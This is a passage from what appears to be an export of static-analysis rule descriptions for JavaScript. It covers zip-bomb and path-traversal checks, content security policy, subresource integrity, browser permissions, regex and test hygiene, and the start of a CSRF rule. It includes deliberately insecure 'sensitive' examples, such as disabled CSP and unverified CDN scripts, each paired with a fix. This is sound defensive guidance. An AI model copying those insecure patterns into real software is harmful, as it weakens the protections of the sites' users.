      fileCount++;
      if (fileCount &amp;gt; MAX_FILES) {
        throw 'Reached max. number of files';
      }
      // Prevent ZipSlip path traversal (S6096)
      const resolvedPath = pathmodule.join(targetDirectory, zipEntry.name);
      if (!resolvedPath.startsWith(targetDirectory)) {
        throw 'Path traversal detected';
      }
      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(resolvedPath);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          totalSize += content.length;
          if (totalSize &amp;gt; MAX_SIZE) {
            throw 'Reached max. size';
          }
          fs.writeFileSync(resolvedPath, content);
        });
      }
    });
  });
});
&lt;/pre&gt;
&lt;p&gt;Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to
decide if the implementation is secure.&lt;/p&gt;
&lt;p&gt;For &lt;a href="https://github.com/thejoshwolfe/yauzl"&gt;yauzl&lt;/a&gt; module&lt;/p&gt;
&lt;pre&gt;
const yauzl = require('yauzl');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;
yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;
  let fileCount = 0;
  let totalSize = 0;
  zipfile.on("entry", function(entry) {
    fileCount++;
    if (fileCount &amp;gt; MAX_FILES) {
      throw 'Reached max. number of files';
    }
    // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
    // Alternatively, calculate the size from the readStream.
    let entrySize = entry.uncompressedSize;
    totalSize += entrySize;
    if (totalSize &amp;gt; MAX_SIZE) {
      throw 'Reached max. size';
    }
    if (entry.compressedSize &amp;gt; 0) {
      let compressionRatio = entrySize / entry.compressedSize;
      if (compressionRatio &amp;gt; THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
      }
    }
    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});
&lt;/pre&gt;
&lt;p&gt;Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to
decide if the implementation is secure.&lt;/p&gt;
&lt;p&gt;For &lt;a href="https://github.com/maxogden/extract-zip"&gt;extract-zip&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const extract = require('extract-zip')
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;
async function main() {
  let fileCount = 0;
  let totalSize = 0;
  let target = __dirname + '/foo';
  await extract('foo.zip', {
    dir: target,
    onEntry: function(entry, zipfile) {
      fileCount++;
      if (fileCount &amp;gt; MAX_FILES) {
        throw 'Reached max. number of files';
      }
      // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
      // Alternatively, calculate the size from the readStream.
      let entrySize = entry.uncompressedSize;
      totalSize += entrySize;
      if (totalSize &amp;gt; MAX_SIZE) {
        throw 'Reached max. size';
      }
      if (entry.compressedSize &amp;gt; 0) {
        let compressionRatio = entrySize / entry.compressedSize;
        if (compressionRatio &amp;gt; THRESHOLD_RATIO) {
          throw 'Reached max. compression ratio';
        }
      }
    }
  });
}
main();
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; -
  Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/409.html"&gt;MITRE, CWE-409&lt;/a&gt; - Improper Handling of Highly Compressed Data (Data Amplification)
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.bamsoftware.com/hacks/zipbomb/"&gt;bamsoftware.com&lt;/a&gt; - A better Zip Bomb &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5728</t>
  </si>
  <si>
    <t>Disabling content security policy fetch directives is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Content security policy (CSP) (fetch directives) is a &lt;a href="https://www.w3.org/TR/CSP3/"&gt;W3C standard &lt;/a&gt; which is used by a server to specify,
via a http header, the origins from where the browser is allowed to load resources. It can help to mitigate the risk of cross site scripting (XSS)
attacks and reduce privileges used by an application. If the website doesnâ€™t define CSP header the browser will apply &lt;a
href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy"&gt;same-origin policy&lt;/a&gt; by default.&lt;/p&gt;
&lt;pre&gt;
Content-Security-Policy: default-src 'self'; script-src â€˜self â€˜ http://www.example.com
&lt;/pre&gt;
&lt;p&gt;In the above example, all resources are allowed from the website where this header is set and script resources fetched from example.com are also
authorized:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;img src="selfhostedimage.png&amp;gt;&amp;lt;/script&amp;gt; &amp;lt;!-- will be loaded because default-src 'self'; directive is applied  --&amp;gt;
&amp;lt;img src="http://www.example.com/image.png&amp;gt;&amp;lt;/script&amp;gt;  &amp;lt;!-- will NOT be loaded because default-src 'self'; directive is applied  --&amp;gt;
&amp;lt;script src="http://www.example.com/library.js&amp;gt;&amp;lt;/script&amp;gt; &amp;lt;!-- will be loaded because script-src â€˜self â€˜ http://www.example.comdirective is applied  --&amp;gt;
&amp;lt;script src="selfhostedscript.js&amp;gt;&amp;lt;/script&amp;gt; &amp;lt;!-- will be loaded because script-src â€˜self â€˜ http://www.example.com directive is applied  --&amp;gt;
&amp;lt;script src="http://www.otherexample.com/library.js&amp;gt;&amp;lt;/script&amp;gt; &amp;lt;!-- will NOT be loaded because script-src â€˜self â€˜ http://www.example.comdirective is applied  --&amp;gt;
&lt;/pre&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The resources of the application are fetched from various untrusted locations. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Implement content security policy fetch directives, in particular &lt;em&gt;default-src&lt;/em&gt; directive and continue to properly sanitize and validate all
inputs of the application, indeed CSP fetch directives is only a tool to reduce the impact of cross site scripting attacks.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;In a Express.js application, the code is sensitive if the &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet&lt;/a&gt; contentSecurityPolicy
middleware is disabled:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(
    helmet({
      contentSecurityPolicy: false, // sensitive
    })
);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;In a Express.js application, a standard way to implement CSP is the &lt;a href="https://www.npmjs.com/package/helmet"&gt;helmet contentSecurityPolicy
middleware&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const helmet = require('helmet');
let app = express();
app.use(helmet.contentSecurityPolicy()); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.w3.org/TR/CSP3/"&gt;w3.org&lt;/a&gt; - Content Security Policy Level 3 &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration.html"&gt;OWASP Top 10 2017 Category
  A6&lt;/a&gt; - Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP"&gt;developer.mozilla.org&lt;/a&gt; - Content Security Policy (CSP) &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5725</t>
  </si>
  <si>
    <t>Disabling resource integrity features is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Fetching external resources, for example from a CDN, without verifying their integrity could impact the security of an application if the CDN gets
compromised and resources are replaced by malicious ones. Resources integrity feature will block resources inclusion into an application if the
pre-computed digest of the expected resource doesnâ€™t match with the digest of the retrieved resource.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The resources are fetched from external CDNs. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; implement resources integrity checks for all static resources (where "static" means that the resourceâ€™s content doesnâ€™t change dynamically
  based on the browser) &lt;/li&gt;
  &lt;li&gt; use versioned resources instead of using "latest" version of the resources &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
let script = document.createElement("script"); // Sensitive
script.src = "https://cdnexample.com/script-latest.js";
script.crossOrigin = "anonymous";
document.head.appendChild(script);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let script = document.createElement("script");
script.src = "https://cdnexample.com/script-v1.2.3.js";
script.integrity = "sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"; // Compliant
script.crossOrigin = "anonymous";
document.head.appendChild(script);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/353.html"&gt;CWE-353&lt;/a&gt; - Missing Support for Integrity Check &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration.html"&gt;OWASP Top 10 2017 Category
  A6&lt;/a&gt; - Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity"&gt;developer.mozilla.org&lt;/a&gt; - Subresource Integrity &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5604</t>
  </si>
  <si>
    <t>Using intrusive permissions is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://www.w3.org/TR/permissions/#powerful-feature"&gt;Powerful features&lt;/a&gt; are browser features (geolocation, camera, microphone â€¦â€‹) that
can be accessed with JavaScript API and may require a permission granted by the user. These features can have a high impact on privacy and user
security thus they should only be used if they are really necessary to implement the critical parts of an application.&lt;/p&gt;
&lt;p&gt;This rule highlights intrusive permissions when requested with &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Permissions/query"&gt;the
future standard (but currently experimental) web browser query API&lt;/a&gt; and specific APIs related to the permission. It is highly recommended to
customize this rule with the permissions considered as intrusive in the context of the web application.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Some powerful features used by the application are not really necessary. &lt;/li&gt;
  &lt;li&gt; Users are not clearly informed why and when powerful features are used by the application. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You are at risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; In order to respect user privacy it is recommended to avoid using intrusive powerful features. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;When using &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Geolocation_API"&gt;geolocation API&lt;/a&gt;, Firefox for example retrieves personal
information like nearby wireless access points and IP address and sends it to the default geolocation service provider, &lt;a
href="https://www.google.com/privacy/lsf.html"&gt;Google Location Services&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
navigator.permissions.query({name:"geolocation"}).then(function(result) {
});  // Sensitive: geolocation is a powerful feature with high privacy concerns
navigator.geolocation.getCurrentPosition(function(position) {
  console.log("coordinates x="+position.coords.latitude+" and y="+position.coords.longitude);
}); // Sensitive: geolocation is a powerful feature with high privacy concerns
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;If geolocation is required, always explain to the user why the application needs it and prefer requesting an approximate location when
possible:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;
        Retailer website example
    &amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    Type a city, street or zip code where you want to retrieve the closest retail locations of our products:
    &amp;lt;form method=post&amp;gt;
        &amp;lt;input type=text value="New York"&amp;gt; &amp;lt;!-- Compliant --&amp;gt;
    &amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Web Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data
  Exposure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/250.html"&gt;CWE-250&lt;/a&gt; - Execution with Unnecessary Privileges &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/359.html"&gt;CWE-359&lt;/a&gt; - Exposure of Private Information &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.w3.org/TR/permissions/"&gt;W3C&lt;/a&gt; - Permissions &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://support.mozilla.org/en-US/kb/does-firefox-share-my-location-websites"&gt;Mozilla&lt;/a&gt; - Does Firefox share my location with
  websites? &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1121</t>
  </si>
  <si>
    <t>Assignments should not be made from within sub-expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have
side-effects.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (val = value() &amp;amp;&amp;amp; check()) { // Noncompliant
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
val = value();
if (val &amp;amp;&amp;amp; check()) {
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;The rule does not raise issues for the following patterns:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; assignments at declaration-level: &lt;code&gt;let a = b = 0;&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; chained assignments: &lt;code&gt;a = b = c = 0;&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; relational assignments: &lt;code&gt;(a = 0) != b&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; sequential assignments: &lt;code&gt;a = 0, b = 1, c = 2&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; assignments in lambda body: &lt;code&gt;() =&amp;gt; a = 0&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; conditional assignment idiom: &lt;code&gt;a || (a = 0)&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; assignments in (do-)while conditions: &lt;code&gt;while (a = 0);&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/481.html"&gt;MITRE, CWE-481&lt;/a&gt; - Assigning instead of Comparing &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4634</t>
  </si>
  <si>
    <t>Shorthand promises should be used</t>
  </si>
  <si>
    <t>&lt;p&gt;When a &lt;code&gt;Promise&lt;/code&gt; needs to only "resolve" or "reject", itâ€™s more efficient and readable to use the methods specially created for such use
cases: &lt;code&gt;Promise.resolve(value)&lt;/code&gt; and &lt;code&gt;Promise.reject(error)&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let fulfilledPromise = new Promise(resolve =&amp;gt; resolve(42));
let rejectedPromise = new Promise(function(resolve, reject) {
  reject('fail');
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let fulfilledPromise = Promise.resolve(42);
let rejectedPromise = Promise.reject('fail');
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2699</t>
  </si>
  <si>
    <t>Tests should include assertions</t>
  </si>
  <si>
    <t>&lt;p&gt;A test case without assertions ensures only that no exceptions are thrown. Beyond basic runnability, it ensures nothing about the behavior of the
code under test.&lt;/p&gt;
&lt;p&gt;This rule raises an exception when the assertion library &lt;code&gt;chai&lt;/code&gt; is imported but no assertion is used in a test.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const expect = require('chai').expect;
describe("No assertion", function() {
    it("doesn't test anything", function() { // Noncompliant
        const str = "";
    });
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const expect = require('chai').expect;
describe("Has assertions", function() {
    it("tests a string", function() {
        const str = "";
        expect(str).to.be.a('string');
    });
});
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5842</t>
  </si>
  <si>
    <t>Repeated patterns in regular expressions should not match the empty string</t>
  </si>
  <si>
    <t>&lt;p&gt;A regex should never include a repetitive pattern whose body would match the empty string. This is usually a sign that a part of the regex is
redundant or does not do what the author intended.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
/(?:)*/      // same as the empty regex, the '*' accomplishes nothing
/(?:|x)*/    // same as the empty regex, the alternative has no effect
/(?:x|)*/    // same as 'x*', the empty alternative has no effect
/(?:x*|y*)*/ // same as 'x*', the first alternative would always match, y* is never tried
/(?:x?)*/    // same as 'x*'
/(?:x?)+/    // same as 'x*'
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/x*/
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6019</t>
  </si>
  <si>
    <t>Reluctant quantifiers in regular expressions should be followed by an expression that can't match the empty string</t>
  </si>
  <si>
    <t>&lt;p&gt;When a reluctant (or lazy) quantifier is followed by a pattern that can match the empty string or directly by the end of the regex, it will always
match zero times for &lt;code&gt;*?&lt;/code&gt; or one time for &lt;code&gt;+?&lt;/code&gt;. If a reluctant quantifier is followed directly by the end anchor
(&lt;code&gt;$&lt;/code&gt;), it behaves indistinguishably from a greedy quantifier while being less efficient.&lt;/p&gt;
&lt;p&gt;This is likely a sign that the regex does not work as intended.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
str.split(/.*?x?/); // Noncompliant, this will behave just like "x?"
/^.*?$/.test(str); // Noncompliant, replace with ".*"
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
str.split(/.*?x/);
/^.*$/.test(str);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5843</t>
  </si>
  <si>
    <t>Regular expressions should not be too complicated</t>
  </si>
  <si>
    <t>&lt;p&gt;Overly complicated regular expressions are hard to read and to maintain and can easily cause hard-to-find bugs. If a regex is too complicated, you
should consider replacing it or parts of it with regular code or splitting it apart into multiple patterns at least.&lt;/p&gt;
&lt;p&gt;The complexity of a regular expression is determined as follows:&lt;/p&gt;
&lt;p&gt;Each of the following operators increases the complexity by an amount equal to the current nesting level and also increases the current nesting
level by one for its arguments:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;|&lt;/code&gt; - when multiple &lt;code&gt;|&lt;/code&gt; operators are used together, the subsequent ones only increase the complexity by 1 &lt;/li&gt;
  &lt;li&gt; Quantifiers (&lt;code&gt;*&lt;/code&gt;, &lt;code&gt;+&lt;/code&gt;, &lt;code&gt;?&lt;/code&gt;, &lt;code&gt;{n,m}&lt;/code&gt;, &lt;code&gt;{n,}&lt;/code&gt; or &lt;code&gt;{n}&lt;/code&gt;) &lt;/li&gt;
  &lt;li&gt; Lookahead and lookbehind assertions &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, each use of the following features increase the complexity by 1 regardless of nesting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; character classes &lt;/li&gt;
  &lt;li&gt; back references &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If a regular expression is split among multiple variables, the complexity is calculated for each variable individually, not for the whole regular
expression.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const datePattern = /^(?:(?:31(\/|-|\.)(?:0?[13578]|1[02]))\1|(?:(?:29|30)(\/|-|\.)(?:0?[13-9]|1[0-2])\2))(?:(?:1[6-9]|[2-9]\d)?\d{2})$|^(?:29(\/|-|\.)0?2\3(?:(?:(?:1[6-9]|[2-9]\d)?(?:0[48]|[2468][048]|[13579][26])|(?:(?:16|[2468][048]|[3579][26])00))))$|^(?:0?[1-9]|1\d|2[0-8])(\/|-|\.)(?:(?:0?[1-9])|(?:1[0-2]))\4(?:(?:1[6-9]|[2-9]\d)?\d{2})$/;
if (dateString.match(datePattern)) {
    handleDate(dateString);
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const datePattern = /^\d{1,2}([-/.])\d{1,2}\1\d{1,4}$/;
if (dateString.match(datePattern)) {
    const dateParts[] = dateString.split("[-/.]");
    int day = parseInt(dateParts[0]);
    int month = parseInt(dateParts[1]);
    int year = parseInt(dateParts[2]);
    // Put logic to validate and process the date based on its integer parts here
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1116</t>
  </si>
  <si>
    <t>Extra semicolons should be removed</t>
  </si>
  <si>
    <t>&lt;p&gt;Extra semicolons (&lt;code&gt;;&lt;/code&gt;) are usually introduced by mistake, for example because:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; It was meant to be replaced by an actual statement, but this was forgotten. &lt;/li&gt;
  &lt;li&gt; There was a typo which lead the semicolon to be doubled, i.e. &lt;code&gt;;;&lt;/code&gt;. &lt;/li&gt;
  &lt;li&gt; There was a misunderstanding about where semicolons are required or useful. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var x = 1;; // Noncompliant
function foo() {
};  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var x = 1;
function foo() {
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5958</t>
  </si>
  <si>
    <t>Tests should check which exception is thrown</t>
  </si>
  <si>
    <t>&lt;p&gt;It is not good enough to test if an exception is raised, without checking which exception it is. Such tests will not be able to differentiate the
expected exception from an unexpected one. They should instead validate the exception message and/or type.&lt;/p&gt;
&lt;p&gt;This rule raises an issue in the following cases:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; When an asynchronous Mocha test calls the &lt;code&gt;done()&lt;/code&gt; callback, without parameters, in a &lt;code&gt;catch&lt;/code&gt; block and there is no
  reference to the caught exception in this block. Either the error should be passed to &lt;code&gt;done()&lt;/code&gt; or the exception should be checked
  further. &lt;/li&gt;
  &lt;li&gt; When Chai assertions are used to test if a function throws any exception, or an exception of type &lt;code&gt;Error&lt;/code&gt; without checking the
  message. &lt;/li&gt;
  &lt;li&gt; When Chai assertions are used to test if a function does not throw an exception of type &lt;code&gt;Error&lt;/code&gt; without checking the message. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Rule doesn't raise an issue when assertion is negated using &lt;code&gt;not&lt;/code&gt;, it such case the exception doesn't need to be specific.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const expect = require("chai").expect;
const fs = require("fs");
describe("exceptions are not tested properly", function() {
    const funcThrows = function () { throw new TypeError('What is this type?'); };
    const funcNoThrow = function () { /*noop*/ };
    it("forgot to pass the error to 'done()'", function(done) {
        fs.readFile("/etc/zshrc", 'utf8', function(err, data) {
            try {
                expect(data).to.match(/some expected string/);
            } catch (e) {  // Noncompliant
                // Either the exception should be passed to done(e), or the exception should be tested further.
                done();
            }
        });
    });
    it("does not 'expect' a specific exception", function() {
        expect(funcThrows).to.throw();  // Noncompliant
        // Error is not precise enough
        expect(funcThrows).to.throw(Error);  // Noncompliant
    });
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const expect = require("chai").expect;
const { AssertionError } = require('chai');
const fs = require("fs");
describe("exceptions are tested properly", function() {
    const funcThrows = function () { throw new TypeError('What is this type?'); };
    const funcNoThrow = function () { /*noop*/ };
    it("forgot to pass the error to 'done()'", function(done) {
        fs.readFile("/etc/zshrc", 'utf8', function(err, data) {
            try {
                expect(data).to.match(/some expected string/);
            } catch (e) {
                expect(e).to.be.an.instanceof(AssertionError);
                done();
            }
        });
    });
    it("does not 'expect' a specific exception", function() {
        expect(funcThrows).to.throw(TypeError);
        expect(funcNoThrow).to.not.throw(Error, /My error message/);
    });
});
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3415</t>
  </si>
  <si>
    <t>Assertion arguments should be passed in the correct order</t>
  </si>
  <si>
    <t>&lt;p&gt;Many assertion functions have specific parameters for the expected and actual values. Swap them, and your test will still have the same outcome
(succeed/fail when it should) but the error messages will be confusing.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when the "expected" argument of an assertion function is a hard-coded value and the "actual" argument is not.&lt;/p&gt;
&lt;p&gt;This rule currently supports Chai assertions.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const assert = require('chai').assert;
const expect = require('chai').expect;
const should = require('chai').should();
it("inverts arguments", function() {
    assert.equal(42, aNumber); // Noncompliant
    expect(42).to.equal(aNumber); // Noncompliant
    should.fail(42, aNumber);  // Noncompliant
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const assert = require('chai').assert;
const expect = require('chai').expect;
const should = require('chai').should();
it("inverts arguments", function() {
    assert.equal(aNumber, 42);
    expect(aNumber).to.equal(42);
    should.fail(aNumber, 42);
});
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1117</t>
  </si>
  <si>
    <t>Variables should not be shadowed</t>
  </si>
  <si>
    <t>&lt;p&gt;Overriding or shadowing a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of
code. Further, it could lead maintainers to introduce bugs because they think theyâ€™re using one variable but are really using another.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1119</t>
  </si>
  <si>
    <t>Labels should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Labels are not commonly used, and many developers do not understand how they work. Moreover, their usage makes the control flow harder to follow,
which reduces the codeâ€™s readability.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
myLabel: {
  let x = doSomething();
  if (x &amp;gt; 0) {
    break myLabel;
  }
  doSomethingElse();
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let x = doSomething();
if (x &amp;lt;= 0) {
  doSomethingElse();
}
&lt;/pre&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1472</t>
  </si>
  <si>
    <t>Function call arguments should not start on new lines</t>
  </si>
  <si>
    <t>&lt;p&gt;Because semicolons at the ends of statements are optional, starting function call arguments on a separate line makes the code confusing. It could
lead to errors and most likely &lt;em&gt;will&lt;/em&gt; lead to questions for maintainers.&lt;/p&gt;
&lt;p&gt;What was the initial intent of the developer?&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt; Define a function and then execute some unrelated code inside a closure ? &lt;/li&gt;
  &lt;li&gt; Pass the second function as a parameter to the first one ? &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The first option will be the one chosen by the JavaScript interpreter.&lt;/p&gt;
&lt;p&gt;By extension, and to improve readability, any kind of function call argument should not start on new line.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var fn = function () {
  //...
}
(function () { // Noncompliant
  //...
})();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;Either&lt;/p&gt;
&lt;pre&gt;
// define a function
var fn = function () {
  //...
}; // &amp;lt;-- semicolon added
// then execute some code inside a closure
(function () {
  //...
})();
&lt;/pre&gt;
&lt;p&gt;Or&lt;/p&gt;
&lt;pre&gt;
var fn = function () {
  //...
}(function () { // &amp;lt;-- start function call arguments on same line
  //...
})();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4502</t>
  </si>
  <si>
    <t>Disabling CSRF protections is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive
actions that he didnâ€™t intend, such as updating his profile or sending a message, more generally anything that can change the state of the
application.&lt;/p&gt;
&lt;p&gt;The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a
hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
